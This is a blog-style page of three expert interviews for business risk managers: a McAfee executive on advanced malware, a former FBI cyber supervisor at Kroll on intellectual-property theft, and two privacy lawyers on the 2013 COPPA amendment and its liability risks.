Fighting Advanced Malware

A Q&A with Ramon Peypoch of McAfee, Inc.
One of the most insidious enemies of data security is advanced malware. But what are these advanced persistent threats, and how can companies protect themselves from them? I asked Ramon Peypoch, VP of Web Protection at McAfee to share his expertise.

Can you please define ‘advanced malware’ and describe the harm it can bring to an organization?
There’s a confluence of different situations that can fall under the term advanced malware, but basically these are stealth attacks that tend to get past existing security solutions. The threats might come from state-sponsored entities such as the Chinese or Russian governments trying to penetrate United States government networks or steal IP from commercial enterprises. What we know is that advanced malware is responsible for a great deal of loss in terms of IP and financial assets. In terms of the actual techniques involved, advanced malware typically combines sophisticated hacking, social engineering and spear fishing that allow an intruder to go undetected in your network for a long period of time. One example might be something that looks like an email from a friend telling you to click on a link to view vacation photos—you click on the link and nothing seems to happen but important code is downloaded to the machine that would “wake up” the next time you enter in PII. The bottom line is that these are very real threats being perpetrated by very sophisticated people. This is not some 13 year-old antisocial kid trying to make a name for himself.

How common is this threat for organizations?
Research shows us that the true cost of cyber crime is staggering—multiple billions of dollars of losses on an annual basis. If you are a business with any type of sensitive financial information or intellectual property, you are a target. And unfortunately hackers don’t just go after the largest organizations. They actually get the most bang for their buck with small and medium enterprises, because these are often more susceptible than the big guys.

How does advanced malware get through the system? Are organizations failing to implement controls that could stop it?
Basically, advanced malware can defeat signature-based defenses—the conventional security solutions that most people are using today. These are great at stopping already-identified threats but they won’t catch anything new. Since traditional solutions are not effective, the gap is widening, allowing the threats to grow exponentially.

What can a company do to mitigate this exposure proactively?
The easy answer from my perspective is to look into McAfee’s solutions. We are taking a different approach to solving this problem. We use the traditional signature-based solution and complement it with a specific advanced malware solution that uses cloud-based lookups and analysis including a hash of malware sent to different parts of the McAfee protection network. Once it’s identified, it’s stopped right there at all the endpoints and we can do a lookup to make sure nothing has been compromised—if it has, we initiate a remediation process. Unlike a lot of our competitors’ solutions, it’s not just a malware sandbox, it’s actually multiple products working to combat the problem in an integrated way.

In summary…
Ramon underscores the problem that many of our clients are seeing and combating on a daily basis. The bad guys are very smart and often one step ahead of both human and electronic security measures, giving them unauthorized access to information-based assets. Even clients with sophisticated IT operations and large security budgets can fall victim simply because there are so many variables and third-party dependencies to control. (A few examples include a large server farm with an unknown system missing a patch, mishaps with vendors, or staff that get duped.) Organizations need to keep this in mind when selecting solutions for combating malware.

Protecting Intellectual Property from Internal and External Theft

A Q&A with Tim Ryan of Kroll
The second in our ongoing series on IP theft, this Q&A with Tim Ryan of Kroll explores the current situation companies are facing vis à vis data security and intellectual property, and what they can do to better arm against growing threats. A former FBI supervisor for the largest cyber squad in the United States, Ryan is currently the head of Kroll’s cyber practice which handles incident response, breach investigations and risk assessment.

Can you explain the current situation of international IP theft in corporate America? What do companies need to know? Are there any misconceptions or myths that need to be addressed?
The problems we see fall into one of two main buckets. Companies are getting hacked externally by competitors looking for anything from product designs to marketing information or other data. The other threat is from insiders, contractors or employees who move on and take key data such as proprietary algorithms with them. Adding to the complexity of the situation is the fact that a lot of knowledge workers are foreign nationals residing here strictly for employment purposes so all of the legal constraints against taking data—non-compete and nondisclosure agreements–may not apply to them. As we move toward a knowledge-based economy, this poses a real problem. The biggest myth out there is that this is an IT issue—the thief downloaded the information from an IT system so that’s the department that will handle it. Sometimes vendors play into that myth by offering data loss prevention hardware or software with the promise that it will keep theft from happening but we all know that’s just not true. The truth is that for both external and internal threats you need a comprehensive team approach.

Why is this happening? Why now?
This is just a measure of how our economy has changed. We are constantly looking for efficiency through technology and we seamlessly share data across broad geographic areas in the blink of an eye. Those same systems, if not properly controlled, can allow access to that sensitive data. I also think it has something to do with the transient nature of our workplace. We no longer work at a single organization for twenty years. It’s often employees that are further down the food chain that are taking the info from job to job. People in the government know this practice is illegal but in the private sector it can be more amorphous as to what data is proprietary. Often we will get a call from a company when they realize that they unwittingly have another company’s data.

How might a company go about protecting their IP data and systems?
You need to have an integrated team that can deal with a threat. From an external point of view, it’s about IT architecture, governance, response training and risk assessment. Sometimes companies won’t do anything about external hacking because the problem doesn’t escalate from the lower level employees to the C-suite level. We find that there might be a conflict of interest, because IT employees feel it’s their job to prevent leaks so when something happens they don’t want to ring alarm bells. But that’s where a small problem can become a big one.

When you’re talking about internal issues, you need a team with IT, legal, human resources and the chief security officer. Too often companies are surprised to find out that an employee is doing something wrong, so it starts in the very beginning, with hiring practices, vetting every individual with a background check. However, when someone is from a foreign country it can be difficult to access criminal records, so you look at the timeline, you look at their skills, you look at everything very closely. And once they are hired, you limit their access to data. In the FBI employees are re-vetted every five years, and it should be the same for corporations. There also needs to be accountability. We recently investigated a case where an individual started with relatively minor infractions and then progressively got worse. The company documented what was happening but never did anything about it and by the time he was fired he had done something really egregious.

There’s a bigger trend, especially in large defense corporations, to bring in in-house data security, but if you go to medical facilities, financial trading firms and companies in the R&D space, they sometimes haven’t gone far enough and that’s when they get hit. Any organization should think about security solutions, whether it’s hiring someone internally or buying an off-the-shelf product, because the threat is out there and it’s real.

In summary…
Mr. Ryan mentioned the importance of IP in this new knowledge-based economy, making security paramount for companies whose data is their lifeblood. The recent study by Mandiant, available in the eRisk Hub, underscores the reality of this problem impacting corporate America every day. Many businesses still don’t have an inventory of their IP that needs protection. Having this in place is crucial for strategically protecting these assets. One possibility companies should consider, for example, is whether every system that houses IP needs to be connected to the public internet.

Understanding COPPA and its Risk Ramifications

A Q&A with James Prendergast and Chris DiIenno of Nelson Levine De Luca and Hamilton
First put into effect in 2000, the Children’s Online Privacy Protection Act (COPPA) was designed to protect the PII of children under age 13 online. In July, 2013, the regulation was revised to address more recent ways that children use the internet—namely, through social networking, apps and mobile devices. To better grasp the new amendment’s implications for businesses that collect the PII of children online, I talked to Jim Prendergast and Chris DiIenno, partners in the Privacy and Data Security Group at Nelson Levine De Luca and Hamilton, LLC.

Can you give us a summary of the COPPA amendment that went into effect July 1, 2013?
The main highlights are the following:

  1. The regulation requires parental notification and consent for any entity collecting children’s PII.
  2. Personal information has now been much more expansively defined under COPPA so that collecting some forms of data that were routinely collected in the past without parental consent would now be in clear violation of the regulation. This includes geographic location information, photographs, video, audio, user names and persistent identifiers.
  3. Third party vendors providing plug-ins and ad networks are now expressly required to obtain parental consent and notification.

What are the cyber liability risk ramifications for any company that collects, stores and shares PII from children?
The risks include fines and injunctions from the FTC and class action lawsuits if the data is not collected carefully and properly. This new legislation targets app makers and website operators who have consciously directed their marketing to a younger audience. The FTC is  looking for violations. If they catch violators, expect a substantial fine and bad publicity. I would also say that the third party plug-in providers, which were left out of the first law through a loophole, and have routinely been collecting information, might be the most threatened by this regulation. The worst-case scenario would be an app designer that either hasn’t paid attention to the amendment or has chosen to ignore it and has collected PII from kids for a long time.

What are the penalties?
Any entity that violates the new COPPA statute is subject to the full wrath of the FTC.  The FTC can put  violators out of business—either by substantial fines (up to $16,000 per violation) or by ruining their business reputation. When you’re looking at the fine amounts, consider that a company could be collecting information from 1,000 children and might have multiple violations per child. The FTC, or the states, can also take you to court for an injunction to prohibit you from doing business.

Are you predicting class action lawsuits?
Yes. Class action Lawyers have awaited these modifications with glee. I believe judges would be more inclined to find an identifiable class (which they generally haven’t been for cyber suits) because in this case they are protecting children. And while plaintiffs’ lawyers have had difficulty defining damages in some privacy cases, here, the FTC has done that for them and articulated the $16,000 per violation figure.

What can a company do to mitigate their exposure?

  1. Know the rules.
  2. Get parental consent. If you have any doubt at all that your website is directed at children, go to the COPPA website and figure it out.
  3. Post your privacy policy prominently online.
  4. If you have any change in your data collection at any point you must go out and tell mom and dad that you need their consent again—it’s not good enough to send a notice and then start collecting information.

Another consideration is that companies should try to understand what data they are collecting and how they are using it. They might find that they are collecting and storing data that they once had the intent to use or sell but no longer serves any purpose for them. If you don’t need to collect it, don’t.

Any other thoughts?
Because these regulations are new and directed at children it would definitely help app makers and related vendors to have a privacy liability policy that specifically addresses these issues.

In summary…
COPPA raises the stakes for transparency in a company’s privacy practices if data pertaining to children is involved. For children-directed app makers and others subject to this regulation, staying in compliance may mean facing potential hurdles such as the need for a Direct Notice (email or mail to parent) and getting ‘Verifiable Consent’ by the parents of the child. Some consent methods might be seen as laborious for both the company and parents (such as those that require that parents call, send a fax, mail a signed form, use their credit card, or email with their digital signature) but there’s no way around the regulation. So the big question is: Are website operators and app owners ready to put these practices in place today? Certainly, readiness requires a serious investment. But not tackling these issues might lead to FTC, State AG or plaintiff lawyer suits—something that no company can afford.

No more posts.